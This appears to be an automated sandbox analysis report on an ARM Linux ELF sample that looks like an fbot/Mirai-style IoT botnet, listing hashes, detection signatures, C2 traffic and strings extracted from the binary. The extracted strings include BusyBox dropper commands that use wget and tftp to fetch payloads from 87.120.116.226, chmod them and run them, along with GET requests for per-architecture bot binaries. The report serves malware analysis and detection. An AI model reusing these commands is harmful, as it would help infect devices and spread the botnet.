Linux Analysis Report
arm.elf

Overview

General Information

Sample name: arm.elf
Analysis ID: 1559718
MD5: 3f45dc3fdc50d2412dd299a4190fcccc
SHA1: fe7dddb80fbbf9c1ca71594b88db74aa5282e72a
SHA256: 0b13e408e08c89bac6dc47950aa5faa030c095b439da4d9e31842dceb70db52b
Tags: elfuser-abuse_ch
Infos:

Detection

Score: 48
Range: 0 - 100
Whitelisted: false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

barindex
Source: arm.elf ReversingLabs: Detection: 42%
Source: global traffic TCP traffic: 192.168.2.13:46006 -> 85.239.34.134:7685
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown TCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: arm.elf String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube)
Source: arm.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: daisy.ubuntu.com
Source: arm.elf String found in binary or memory: http://87.120.116.226
Source: arm.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY
Source: arm.elf String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ
Source: Initial sample String containing 'busybox' found: /bin/busybox TSUNAMI
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo
Source: Initial sample String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x2bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox
Source: Initial sample String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sample String containing 'busybox' found: /bin/busybox wget http://
Source: Initial sample String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox tftp -r
Source: Initial sample String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -en '
Source: Initial sample String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sample String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
Source: Initial sample Potential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.arm7 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.x86 HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mips HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.mipsel HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.powerpc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sparc HTTP/1.0
Source: Initial sample Potential command found: GET /fbot.sh4 HTTP/1.0
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal48.linELF@0/0@2/0
Source: /usr/bin/dash (PID: 5416) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp Jump to behavior
Source: /usr/bin/dash (PID: 5417) Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp Jump to behavior
Source: /tmp/arm.elf (PID: 5428) Queries kernel information via 'uname': Jump to behavior
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp Binary or memory string: R |U!/etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp Binary or memory string: :Cx86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs